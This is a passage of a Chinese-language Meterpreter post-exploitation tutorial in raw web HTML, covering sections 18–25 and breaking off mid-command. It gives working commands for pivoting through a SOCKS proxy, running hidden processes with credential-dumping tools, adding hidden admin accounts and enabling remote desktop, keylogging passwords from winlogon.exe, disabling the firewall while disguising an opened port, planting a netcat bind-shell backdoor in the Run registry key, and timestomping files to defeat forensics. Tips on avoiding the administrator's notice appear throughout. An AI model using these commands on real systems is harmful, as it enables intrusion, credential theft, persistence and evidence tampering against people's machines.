1<\/p>\n\n\n\n<p>exploit<\/p>\n\n\n\n<p>\u6548\u679c\u5982\u56fe\uff1a<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025532420-1810078060.gif\" alt=\"\" width=\"554\" height=\"336\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025532857-1204061925.gif\" alt=\"\" width=\"553\" height=\"203\"><br>\u6216\u76f4\u63a5\u5728meterpreter\u4f1a\u8bdd\u4e2d\u4ee5\u547d\u4ee4run&nbsp;post\/windows\/gather\/forensics\/enum_drives\u8c03\u7528<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025533398-73363372.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u6211\u4eec\u9996\u5148\u5c06meterpreter\u4f1a\u8bdd\u653e\u5165\u540e\u53f0\uff0c\u7136\u540e\u641c\u7d22\u6211\u4eec\u7684\u6a21\u5757\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025533972-906692234.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u7136\u540e\u4f7f\u7528use\u547d\u4ee4\u6765\u4f7f\u7528\u6a21\u5757\uff0c\u7136\u540e\u8bbe\u7f6e\u4e00\u4e0b\u4f1a\u8bddid\uff0c\u63a5\u7740\u6267\u884c\uff0c\u53ef\u4ee5\u53d1\u73b0\u6210\u529f\u83b7\u53d6\u5230\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\u5206\u533a\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<p>18.SOCKS\u4ee3\u7406<\/p>\n\n\n\n<p>Metasploit\u53ef\u4ee5\u4f5c\u4e3a\u4e00\u4e2aSOCKS\u4ee3\u7406\u670d\u52a1\u5668\uff0c\u5177\u4f53\u6b65\u9aa4\u4e3a\u9996\u5148\u901a\u8fc7Metasploit\u7684\u67d0\u4e9b\u6a21\u5757\u5efa\u7acb\u4f1a\u8bdd\uff0c\u5c31\u50cf\u672c\u7ae0\u524d\u9762\u4ecb\u7ecd\u7684\uff0c\u5efa\u7acb\u5b8c\u4f1a\u8bdd\u4e4b\u540e\uff0c\u6267\u884c\u201croute add +IP+mask+SID\u201d\uff0c\u672c\u4f8b\u4e2d\u6211\u4eec\u8def\u7531\u7684ip\u7f51\u6bb5\u4e3a10.1.1.0\uff0c\u7136\u540e\u4f7f\u7528\u201cuse auxiliary\/server\/socks4a\u201d\u547d\u4ee4\u6765\u4f7f\u7528sock4a\u6a21\u5757\uff0c\u6267\u884crun\u547d\u4ee4 \uff0csocks\u4fbf\u4f1a\u6267\u884c<\/p>\n\n\n\n<p>\u7136\u540e\u518d\u5728\u547d\u4ee4\u884c\u4e0b\u6267\u884cproxychains\u547d\u4ee4\uff0c\u4f7f\u7528\u4ee3\u7406\u5bf9\u76ee\u6807\u4e3b\u673a\u8fdb\u884c\u626b\u63cf\uff0cnmap\uff0cnc\u7b49\u90fd\u53ef\u4ee5\uff0c\u6b64\u4f8b\u5b50\u4e2d\u6211\u4eec\u5bf9\u76ee\u6807\u673a10.1.1.130\u7684445\u7aef\u53e3\u8fdb\u884c\u626b\u63cf\u3002\u4ece\u8fd4\u56de\u7ed9\u6211\u4eec\u7684\u7ed3\u679c\u53ef\u4ee5\u770b\u5230\uff0c\u6211\u4eec\u7684\u4ee3\u7406\u5df2\u7ecf\u8bbe\u7f6e\u6210\u529f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/211944479.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025534929-386716291.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/212006268.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025535280-149336405.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>19.\u8fd0\u884c\u7a0b\u5e8f<\/p>\n\n\n\n<p>\u6211\u4eec\u8fd8\u53ef\u4ee5\u4f7f\u7528\u201cexecute\u201d\u547d\u4ee4\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u6267\u884c\u5e94\u7528\u7a0b\u5e8f\u3002\u8fd9\u4e2a\u547d\u4ee4\u7684\u4f7f\u7528\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>execute -f&lt;file&gt; [Options]<\/p>\n\n\n\n<p>execute -f cmd.exe -i#\u6267\u884ccmd.exe\u547d\u4ee4\u5e76\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n<p>execute -f cmd.exe -i -t#\u4ee5\u6240\u6709\u53ef\u7528\u4ee4\u724c\u6765\u6267\u884ccmd\u547d\u4ee4<\/p>\n\n\n\n<p>execute -f cmd.exe -i -H -t#\u521b\u5efa\u65b0\u8fdb\u7a0bcmd.exe\uff0c-H\u4e0d\u53ef\u89c1\uff0c-i\u4ea4\u4e92<\/p>\n\n\n\n<p>execute -H -i -f cmd.exe<\/p>\n\n\n\n<p>execute&nbsp; -H -m -d notepad.exe-f&nbsp; wce.exe -a &#8220;-o wce.txt&#8221;<\/p>\n\n\n\n<p>\u8fd0\u884c\u540e\u5b83\u5c06\u6267\u884cfile\u53c2\u6570\u6240\u6307\u5b9a\u7684\u6587\u4ef6\u3002\u53ef\u9009\u53c2\u6570\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p>-H\uff1a\u521b\u5efa\u4e00\u4e2a\u9690\u85cf\u8fdb\u7a0b<\/p>\n\n\n\n<p>-a\uff1a\u4f20\u9012\u7ed9\u547d\u4ee4\u7684\u53c2\u6570<\/p>\n\n\n\n<p>-i\uff1a\u8ddf\u8fdb\u7a0b\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n<p>-m\uff1a\u4ece\u5185\u5b58\u4e2d\u6267\u884c<\/p>\n\n\n\n<p>-t\uff1a\u4f7f\u7528\u5f53\u524d\u4f2a\u9020\u7684\u7ebf\u7a0b\u4ee4\u724c\u8fd0\u884c\u8fdb\u7a0b<\/p>\n\n\n\n<p>-s\uff1a\u5728\u7ed9\u5b9a\u4f1a\u8bdd\u4e2d\u6267\u884c\u8fdb\u7a0b<\/p>\n\n\n\n<p>-f \u6267\u884c\u7684\u7a0b\u5e8f\u6587\u4ef6<\/p>\n\n\n\n<p>-d \u5728\u76ee\u6807\u4e3b\u673a\u6267\u884c\u65f6\u663e\u793a\u7684\u8fdb\u7a0b\u540d\u79f0\uff08\u7528\u4ee5\u4f2a\u88c5\uff09<\/p>\n\n\n\n<p>-o wce.txt&#8221;\u662fwce.exe\u7684\u8fd0\u884c\u53c2\u6570<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112657306025.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025536100-225251154.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>20.\u521b\u5efa\u8d26\u53f7<\/p>\n\n\n\n<p>getgui\u2014\u2014getgui&nbsp;\uff0c\u4e3a\u6dfb\u52a0\u7528\u6237\u7684\u547d\u4ee4\uff0c\u9996\u5148\u7528\u201crun getgui -h\u201d\u67e5\u770b\u811a\u672cgetgui\u7684\u5e2e\u52a9\u4fe1\u606f<\/p>\n\n\n\n<p>run&nbsp; getgui-e #\u5f00\u542f\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n<p>run&nbsp; getgui -uexample_username -pexample_password #\u6dfb\u52a0\u8d26\u53f7<\/p>\n\n\n\n<p>\u8c03\u7528getgui\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n<p>\u4f5c\u7528\uff1a\u5f00\u542f\u76ee\u6807\u4e3b\u673a\u8fdc\u7a0b\u684c\u9762\uff0c\u5e76\u53ef\u6dfb\u52a0\u7ba1\u7406\u5458\u7ec4\u8d26\u53f7<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1a<\/p>\n\n\n\n<p>run&nbsp; getgui&nbsp; -e<\/p>\n\n\n\n<p>\u5f00\u542f\u76ee\u6807\u4e3b\u673a\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n<p>\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025536549-1133925024.gif\" alt=\"\" width=\"554\" height=\"171\"><br>\u5f00\u542f\u76ee\u6807\u4e3b\u673a\u7684\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\u540e\uff0c\u53ef\u4ee5\u6dfb\u52a0\u8d26\u53f7\u4ee5\u4fbf\u5229\u7528<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1a<\/p>\n\n\n\n<p>run&nbsp; getgui&nbsp;-u&nbsp; example_username&nbsp;-p&nbsp; example_password<\/p>\n\n\n\n<p>\u5982\u4e0b\u56fe\uff1a<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025537064-740496480.gif\" alt=\"\" width=\"644\" height=\"222\"><br>\u6267\u884c\u6210\u529f\uff0c\u53ef\u4ee5\u4f7f\u7528kali\u7684rdesktop\u547d\u4ee4\u4f7f\u7528\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5\u76ee\u6807\u4e3b\u673a<\/p>\n\n\n\n<p>rdesktop&nbsp; -u&nbsp;kali&nbsp; -p&nbsp;meterpreter&nbsp; 192.168.250.176:3389<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210706951.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025537546-607006938.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u4ece\u4e0a\u56fe\u53ef\u4ee5\u770b\u51fa\u8fd9\u4e2a\u811a\u672c\u7684\u7528\u6cd5\u662f\u201crungetgui \u2013u username \u2013p password\u201d\uff0c\u6211\u6dfb\u52a0\u4e86\u4e00\u4e2alu\u7684\u7528\u6237\u5bc6\u7801\u4e3a6666\u3002\u4ece\u4e0b\u56fe\u4e2d\u53ef\u4ee5\u770b\u5230\u7528\u6237\u5df2\u7ecf\u6dfb\u52a0\u6210\u529f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210732344.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025538041-335381243.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u6dfb\u52a0\u5b8c\u8d26\u6237\u4e4b\u540e\u4f7f\u7528rdesktop\u547d\u4ee4\u8fde\u63a5\u4e00\u4e0b\u8fdc\u7a0b\u4e3b\u673a\uff0c\u5177\u4f53\u7528\u6cd5\u662f\u201crdesktop \u2013u username \u2013p password IP\u201d\u6267\u884c\u547d\u4ee4\u4e4b\u540e\u5c31\u4f1a\u5f39\u51fa\u4e00\u4e2a\u7a97\u53e3\uff0c\u53ea\u9700\u518d\u8f93\u5165\u4e00\u6b21\u5bc6\u7801\u5c31\u53ef\u4ee5\u8fdb\u5165\u76ee\u6807\u673a\u5668\uff0c\u5e76\u5bf9\u76ee\u6807\u673a\u5668\u76f4\u63a5\u8fdb\u884c\u63a7\u5236\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210752188.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025538761-467376011.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u53ef\u4ee5\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u7528\u6237\u8d26\u53f7\uff08getgui\u811a\u672c\uff0c\u4f7f\u7528-u\u548c-p\u53c2\u6570\uff09\uff0c\u5e76\u7ed9\u5b83\u5206\u914d\u7ba1\u7406\u5458\u6743\u9650\uff08\u4f7f\u7528\uff09\uff0c\u7136\u540e\u5c06\u5176\u6dfb\u52a0\u5230\u201d\u8fdc\u7a0b\u684c\u9762\u7528\u6237\u201d\u7ec4\u4e2d\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112658182961.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025539180-809203738.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112658282818.png\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025539706-986024207.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u5f53\u7136\u4e86\uff0c\u4f60\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u5c06\u8fd9\u4e2a\u65b0\u6dfb\u52a0\u7684\u7528\u6237Hacker\u5728Windows\u767b\u5f55\u754c\u9762\u4e2d\u9690\u85cf\u3002<\/p>\n\n\n\n<p>21.\u542f\u7528\u8fdc\u7a0b\u684c\u9762<\/p>\n\n\n\n<p>\u5f53\u6211\u4eec\u65b0\u6dfb\u52a0\u7684\u7528\u6237\u5df2\u7ecf\u62e5\u6709<a href=\"https:\/\/www.coengoedegebure.com\/hacking-windows-with-meterpreter\/#anchor_createanewaccount\">\u8fdc\u7a0b\u684c\u9762\u6743\u9650<\/a>\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u8d26\u53f7\u51ed\u8bc1\u6765\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e86\u3002<\/p>\n\n\n\n<p>\u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u786e\u4fdd\u76ee\u6807Windows\u8bbe\u5907\u5f00\u542f\u4e86\u8fdc\u7a0b\u684c\u9762\u529f\u80fd\uff08\u9700\u8981\u5f00\u542f\u591a\u4e2a\u670d\u52a1\uff09\uff0c\u4e0d\u8fc7\u6211\u4eec\u7684getgui\u811a\u672c\u53ef\u4ee5\u5e2e\u6211\u4eec\u641e\u5b9a\u3002\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528-e\u53c2\u6570\u786e\u4fdd\u76ee\u6807\u8bbe\u5907\u5f00\u542f\u4e86\u8fdc\u7a0b\u684c\u9762\u529f\u80fd\uff08\u91cd\u542f\u4e4b\u540e\u540c\u6837\u4f1a\u81ea\u52a8\u5f00\u542f\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/1511265869872.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025540083-1521929743.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u5728\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\u4f1a\u8bdd\u4e4b\u524d\uff0c\u6211\u4eec\u8fd8\u9700\u8981\u4f7f\u7528\u201cidletime\u201d\u547d\u4ee4\u68c0\u67e5\u8fdc\u7a0b\u7528\u6237\u7684\u7a7a\u95f2\u65f6\u957f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112658939687.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025540363-76299135.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u8fd9\u6837\u53ef\u4ee5\u964d\u4f4e\u4f60\u88ab\u53d1\u73b0\u7684\u6982\u7387\uff0c\u56e0\u4e3a\u5f53\u76ee\u6807\u7528\u6237\u767b\u5f55\u4e4b\u540e\uff0c\u5b83\u5c06\u4f1a\u770b\u5230\u5982\u4e0b\u56fe\u6240\u793a\u7684\u4fe1\u606f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112659137172.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025540926-2039349508.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u4e0b\u56fe\u663e\u793a\u7684\u662f\u653b\u51fb\u8005\u4f7f\u7528\u65b0\u521b\u5efa\u7684\u201cHacker\u201d\u8d26\u53f7\u8fde\u63a5\u5230\u8fdc\u7a0b\u684c\u9762\u7684\u753b\u9762\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112659225772.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025541931-1923094334.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>run post\/windows\/manage\/enable_rdp<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025542363-965970766.gif\" alt=\"20161006114052\"\/><\/figure>\n\n\n\n<p>\u8fd8\u53ef\u4ee5\u4f7f\u7528&nbsp;run getgui -e&nbsp;\u6765\u5f00\u542f\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025542756-1024491208.gif\" alt=\"20161006121512\"\/><\/figure>\n\n\n\n<p>\u5229\u7528\u8be5\u547d\u4ee4\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6dfb\u52a0\u7528\u6237\uff1a<\/p>\n\n\n\n<p>run getgui -u xxxxx -p xxxxx<\/p>\n\n\n\n<p>22.\u7ed1\u5b9a\u8fdb\u7a0b<\/p>\n\n\n\n<p>Meterpreter\u65e2\u53ef\u4ee5\u5355\u72ec\u8fd0\u884c\uff0c\u4e5f\u53ef\u4ee5\u4e0e\u5176\u4ed6\u8fdb\u7a0b\u8fdb\u884c\u7ed1\u5b9a\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u8ba9Meterpreter\u4e0e\u7c7b\u4f3cexplorer.exe\u8fd9\u6837\u7684\u8fdb\u7a0b\u8fdb\u884c\u7ed1\u5b9a\uff0c\u5e76\u4ee5\u6b64\u6765\u5b9e\u73b0\u6301\u4e45\u5316\u3002<\/p>\n\n\n\n<p>\u5728\u4e0b\u9762\u7684\u4f8b\u5b50\u4e2d\uff0c\u6211\u4eec\u4f1a\u5c06Meterpreter\u8ddfwinlogon.exe\u7ed1\u5b9a\uff0c\u5e76\u5728\u767b\u5f55\u8fdb\u7a0b\u4e2d\u6355\u83b7\u952e\u76d8\u8bb0\u5f55\u3002<\/p>\n\n\n\n<p>\u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u4f7f\u7528\u201cps\u201d\u547d\u4ee4\u67e5\u770b\u76ee\u6807\u8bbe\u5907\u4e2d\u8fd0\u884c\u7684\u8fdb\u7a0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112659759098.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025543448-160994124.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\uff0c\u4f7f\u7528\u201cgetpid\u201d\u627e\u51fa\u9700\u8981\u7ed1\u5b9a\u7684\u8fdb\u7a0b\uff0c\u63a5\u4e0b\u6765\uff0c\u4f7f\u7528migrate\u547d\u4ee4+pid\u6765\u7ed1\u5b9a\u8fdb\u7a0b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112659865114.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025543793-231628645.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u7ed1\u5b9a\u5b8c\u6210\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5f00\u59cb\u6355\u83b7\u952e\u76d8\u6570\u636e\u4e86\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112659987040.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025544015-536576998.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u53ef\u4ee5\u9009\u62e9\u5bfc\u51fa\u952e\u76d8\u8bb0\u5f55\uff0c\u6216\u8005\u4f7f\u7528\u547d\u4ee4\u201cenum_logged_on_users\u201d\u6765\u68c0\u67e5\u7528\u6237\u662f\u5426\u6210\u529f\u767b\u5f55\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112660065902.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025544448-1207976548.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u7b49\u5f85\u7247\u523b\u4e4b\u540e\uff0c\u4f7f\u7528keyscan_dump\u547d\u4ee4\u5bfc\u51fa\u8bb0\u5f55\u4fe1\u606f:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/image.3001.net\/images\/20171121\/15112660157793.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025544805-1844931953.gif\" alt=\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/><\/a><\/figure>\n\n\n\n<p>\u6355\u6349\u5230\u7684\u7528\u6237\u5bc6\u7801\u4e3atrustno1<\/p>\n\n\n\n<p>23.\u901a\u8fc7\u5176 shell \u6765\u5173\u95ed\u9632\u706b\u5899<\/p>\n\n\n\n<p>netsh adcfirewall set allprofiles state off<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025545245-1516111933.gif\" alt=\"20161006112128\"\/><\/figure>\n\n\n\n<p>\u6211\u4eec\u6253\u5f00\u9632\u706b\u5899\u914d\u7f6e\u67e5\u770b\u9632\u706b\u5899\u5df2\u6210\u529f\u88ab\u6211\u4eec\u5173\u95ed!<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025545548-149606623.gif\" alt=\"20161006113355\"\/><\/figure>\n\n\n\n<p>\u4f46\u662f\u6211\u4eec\u53ef\u4ee5\u770b\u51fa\uff0c\u5982\u679c\u76ee\u6807\u7ba1\u7406\u5458\u67e5\u770b\u9632\u706b\u5899\u914d\u7f6e\uff0c\u53d1\u73b0\u9632\u706b\u5899\u88ab\u4eba\u4e3a\u5173\u95ed\uff0c\u90a3\u4e48\u5fc5\u5b9a\u5f15\u8d77\u7ba1\u7406\u5458\u7684\u8b66\u60d5\uff01\u56e0\u6b64\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u901a\u8fc7\u7b56\u7565\u7684\u6dfb\u52a0\uff0c\u6765\u9690\u853d\u6211\u4eec\u7684\u884c\u4e3a\u3002<\/p>\n\n\n\n<p>netsh firewall add portopening TCP 444 \u201cVMWARE\u201d ENABLE ALL<\/p>\n\n\n\n<p>\u4f2a\u88c5\u6210\u4e00\u4e2a\u7cfb\u7edf\u6b63\u5e38\u7684\u8fdb\u7a0b\uff0c\u4e4b\u540e\u8fdc\u7a0b\u91cd\u542f\u76ee\u6807\u7cfb\u7edf\uff0c\u5e76\u5229\u7528 NC \u8fde\u63a5\u5373\u53ef\uff01<\/p>\n\n\n\n<p>24.\u5229\u7528\u6ce8\u518c\u8868\u6dfb\u52a0 NC \u540e\u95e8<\/p>\n\n\n\n<p>1.\u4e0a\u4f20 NC \u5230\u76ee\u6807\u7cfb\u7edf\uff1a<\/p>\n\n\n\n<p>upload \/usr\/share\/windows-binaries\/nc.exe C:\\\\windows\\\\system32<\/p>\n\n\n\n<p>2.\u679a\u4e3e\u6ce8\u518c\u8868\u5185\u5bb9\uff08\u5f00\u673a\u542f\u52a8\uff09<\/p>\n\n\n\n<p>reg enumkey -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run<\/p>\n\n\n\n<p>3.\u5728\u8be5\u6ce8\u518c\u8868\u589e\u52a0\u5185\u5bb9\uff08\u5f00\u673a\u542f\u52a8\uff09<\/p>\n\n\n\n<p>reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v nc -d \u201cC:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe\u201d<\/p>\n\n\n\n<p>4.\u67e5\u770b\u5185\u5bb9\u662f\u5426\u589e\u52a0\u6210\u529f\uff1a<\/p>\n\n\n\n<p>reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v nc<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025546272-1692764591.gif\" alt=\"20161006141320\"\/><\/figure>\n\n\n\n<p>25.\u57fa\u4e8eMACE\u65f6\u95f4\u7684\u53cd\u7535\u5b50\u53d6\u8bc1<\/p>\n\n\n\n<p>timestomp -v secist.txt&nbsp; #\u67e5\u770b\u5f53\u524d\u76ee\u6807\u6587\u4ef6 MACE \u65f6\u95f4\u3002<\/p>\n\n\n\n<p>timestomp c:\/a.doc -c \u201c10\/27\/2015 14:22:11\u201d #\u4fee\u6539\u6587\u4ef6\u7684\u521b\u5efa\u65f6\u95f4\uff0c\u4f8b\u5982\u4fee\u6539\u6587\u4ef6\u7684\u521b\u5efa\u65f6\u95f4\uff08\u53cd\u53d6\u8bc1\u8c03\u67e5\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025546736-1977348057.gif\" alt=\"20161006172320\"\/><\/figure>\n\n\n\n<p>timestomp -f c:\\\\AVScanner.ini 